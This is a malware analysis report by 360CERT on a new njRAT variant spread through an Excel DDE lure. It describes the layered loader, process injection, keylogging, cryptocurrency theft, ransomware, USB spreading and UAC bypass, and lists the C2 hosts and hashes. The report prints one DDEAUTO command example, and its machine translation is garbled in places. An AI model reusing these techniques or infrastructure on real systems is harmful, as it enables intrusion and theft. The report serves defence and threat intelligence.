Report number: B6-2018-062601
Report source: 360CERT
Report author: 360CERT
Update date: 2018-06-26
x00 Preface
Recently, 360CERT monitored that new variants of the "njRAT" family of malware are active. The Trojan family is written using the .NET framework, and the samples mentioned in this article contain serious code confusing to hinder security personnel's analysis.
njRAT, also known as Bladabindi, is a plug-in remote control Trojan program. Because Trojan is simple and easy to learn, it greatly lowers the threshold for utilization. During the malicious utilization of the gang, we summarized the following characteristics:
- malicious payload layer by layer encrypted storage
- decryption process controllable
- code obfuscation, and made strong anti-uni reverse
- Global string encryption storage
- has ransomware capabilities (new functions)
- steals digital currency (new functions)
In addition, in the subsequent tracking and association process, we found that the historical behavior of the gang was all used to spread malware through high-interaction strong social work skills and phishing emails, and the targets were banks, taxation and other institutions. The samples we captured this time used more vulnerabilities and low-interaction attack skills to implement the samples than before.
x01 Technical Analysis
DDE is a legacy function under the Inter-Process Communication (Inter-Process Communication-IPC) mechanism. It can be traced back to 1987. It can establish a dynamic data exchange (DDE) link with a document created by other Microsoft Windows programs. In the office scenario, in addition to vulnerabilities and macros. DDE is also a commonly used load delivery method.
DDE commonly used attack method is to embed DDEAUTO object, for example:
{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"}
is combined with Powershell, which can perform remote payload downloads, malicious code decoding and releases, remote command execution, etc. Because of the danger of DDE, Microsoft banned the DDE protocol in office in December last year.
This sample is an excel file, requesting updates to perform msiexec remote download and run malicious payloads through the DDE protocol. The file executed first is the memo.msi file. It continues to release the next layer of load in the temporary directory, which contains a Base64-encoded C# code. After transcoding, the code is dynamically converted into an assembly and loaded using Invoke(). After running, a payment will be released again for loading and running. After two releases, the malicious code body will start running. The specific release process of
is as follows:
1. Download the malicious payload through DDE execution and release it to "C:\Users\ADMINI~1\AppData\Local\Temp\mome.msi" for execution.
2. Continue to release the next layer of load in the temporary directory.
3. Decrypt the C# code encoded through BASE64 and dynamically converts it into an assembly. After decrypting the data in its own resources and loading it into the next layer of payload.
4. The resources that read their own files are decrypted through a specific algorithm to obtain Stub.exe (virus body) and adderalldll.dll (injection function DLL).
5, add the boot item and inject Stub.exe (virus principal) into RegAsm.exe (puppet process) by loading adderalldll.dll (injection function DLL).
sample flow chart
sample release:
Virus execution:
- Main functions overview
- Plan task establishment and deletion
- Get host information
- Registration Operation
- USB device infection
- Keyboard record
- Get current windowTitle
- Get running Process information
- detection kill and operating environment
- Bitcoin behavior monitoring
- ransomware
- DDOS (slowloris and ARME)
- Send data to remote C2
- Receive C2 instructions, perform specified operations
C2 instructions
Technical details
Technical details
sample belongs to the njRAT family and is written and generated using C#.When the target is successfully infected, the sample itself copies it to the host for reside (the sample is initially running in memory), and adds the scheduled task resident system. The
sample was confused, and the parameters and fields of key parts were encrypted. First, decrypt it. After decryption, the memory in the relevant location is:
You can write a script for field query, or decrypt the fields in batches. When the
sample is run, the following main threads will be opened according to the running status:
- MyAntiProcess (detection and soft-killing)
- Bitgrb (monitoring Bitcoin application)
- CHuNbRc6NBDgA1N5fN.RLSH5Jqs2M.WRK (keyboard and window title record)
- CHuNbRc6NBDgA1N5fN.C6yF5G7kY (send data and receive C2 instructions)
MyAntiProcess (conducts software and reverse debugging of anti-sandboxes. If some processes are detected, they will try to close them. After the
Bitgrb
Bitgrb process is started, a process scan will be performed to monitor the process life containing the BITCOIN string . When buying or selling bitcoin, crypto wallets are tracked. It is also accompanied by some operations on the content of the clipboard.
CHuNbRc6NBDgA1N5fN.RLSH5Jqs2M.WRK
This function performs keyboard recording and window title recording. 20,480 data are recorded each time. Write the information recorded by the keyboard to the registry to transfer the data.
CHuNbRc6NBDgA1N5fN.C6yF5G7kY
C6yF5G7kY
C6yF5G7kY is divided into three parts. The first is to send host information loop, which includes:
- System name
- Username
- Windows version (64-bit/32-bit)
- webcam (yes/no)
- active window title
- CPU
- GPU
- GPU
- Memory
- Disk
- Infection time
Part 2 accepts C2 instructions and performs related operations. The instruction of
C2 is divided by savage, and the hash value of the first part is extracted for distinction.
The third one is to provide a Socket.send interface to send some information to C2. The function name is ISqOs4Ltj. Passing in a string will send its information to C2.
Information about C2:
Hostname: apache202[.]duckdns[.]org
port: 7752
C2 information, located in:
for Tcp connection:
two methods executed in the
sample The line method can be divided into two types. One is to use Interaction.shell
The other is to use thread.start() to perform operations
ransom
ransomware 4
ransomware main instructions include three RwareDEC, RwareSU, and Rware.
Rware is an encryption module, which uses AES for encryption, mainly for files with the extension name.lime.
randomly generates a character array here. Lime places the output string in %AppData%\Microsoft\MMC\hash position
and will output ransomware information to the interface:
U disk infection
sample has the behavior of U disk infection. First, the disk disk letter on the host is detected, and then the retrieved disk letter will be incremented by one to copy the file. If there are only disks C and D, then the directory array will be copied and returned to C, D and E. Because the disk letters will increase automatically when inserting the USB flash drive, the purpose of propagation to the USB flash drive is achieved.
Bypass There is a privilege hike operation in the UAC
sample, which uses registry hijacking to Bypass UAC.
x02 Sample association analysis
From the top-level domain name: this is a dynamic domain name, and its top-level domain registrant has no association with this event.
We point to IP according to CC 185.208.211.142 Discovery:
Historical Resolution Domain Name:
secureserver202[.]duckdns[.]org
We found a sample in the HYBRID sandbox that is associated with the domain name:
https://www.hybrid-analysis.com/sa mple/9a76ac2c893154592a09a179e5af2c86c8871265d009014bfb5ab25fabdb448a?environmentId=120
From the report in the sandbox, this sample function is similar to the sample function mentioned in this article, but it will connect to two servers: 181[.]215[.]247[.]31, 185[.]208[.]211[.]142. Unlike the sample we found, the CC port is 25255.
According to IP: 181[.]215[.]247[.]31 We obtained his historical correlation information at the 360 Threat Intelligence Center:
Based on the correlation information, we learned that the gang has a domain name: sanddeeprecruit[.]duckdns[.]org
Currently, the domain name A record analysis: 91[.]192[.]100[.]26
According to VT's information, the sample of the gang has been active at least on February 24.
The services opened by the three machines are like cloning, but the C2 ports (2404, 25255, 7752, 1933) obtained from the samples have all been closed.
notis[.]publicvm[.]com
Under this domain name, we found two IOC samples:
8cabb48e50d72bcc315bc53a5ab62907dae22f68d08c78a5e7ed42270080d4d1
21e16f82275a9c168f0ce0d5c817cdbbc5d6d7764bb2e2ab8b63dff70f972600
and passed We found the analysis report released by proofpoint on March 23 this year: https://www.proofpoint.com/us/threat-insight/post/tax-themed-email-campaigns-steal-credentials-spread-banking-trojans-rats-ransomware
The report pointed out that this sample uses tax as the subject to dissemination of banking Trojans, RATs and ransomware through email, and its use is similar to the sample mentioned in this article.
anotiz[.]erlivia[.]ltd
Currently, the IP address of the domain name resolution: 198.54.117.200
Through threat intelligence, we know:
This gang is likely to have used or are using the server to spread malicious payloads through email.
According to their relationship, we finally summarized a picture:
above picture data source: 360NetLab
x03 IOC
x04 Summary:
njRAT This Trojan is simple and easy to learn. If you search online, you will find a large number of articles to configure Trojans or do not kill. Its powerful functions can fully meet the needs of crime. Therefore, the family's Trojans have been very active on the Internet in recent years. After the analysis, we summarized the following points:
1, ransomware
2, digital currency stealing
3, keyboard record
4, automatic infection of USB devices
5, detection and anti-debugging
6. Remote control of
7, hijacking HOST
8, malicious payload encryption obfuscation of
9, string encryption
10, code obfuscation of
11, injecting puppet process to run
0 During the analysis, we found that the sample was running using the puppet process. There was compatibility problem after the injection was completed, and it might need to be executed successfully in a specified environment. Therefore, we infer that this may be a targeted attack, not a large-scale attack. After we traced the source, we learned that the gang started to live at least on February 24 this year. Yue, and his server is still connected. According to the relevant information provided by 360 Security Brain-Big Data, no Chinese computers have been found to be attacked by the gang.
x05 Security suggestions
1. Please do not receive or open any documents sent by any stranger through email or chat software.
2, download and install "360 Security Guard" and keep all protections on and check for software updates regularly.
x06 Timeline
2018-06-26 360CERT Completion Analysis Report
x07 Reference link
- https://www.proofpoint.com/us/threat-insight/post/tax-themed-email-campaigns-steal-credentials-spread-banking-trojans-rats-ransomware
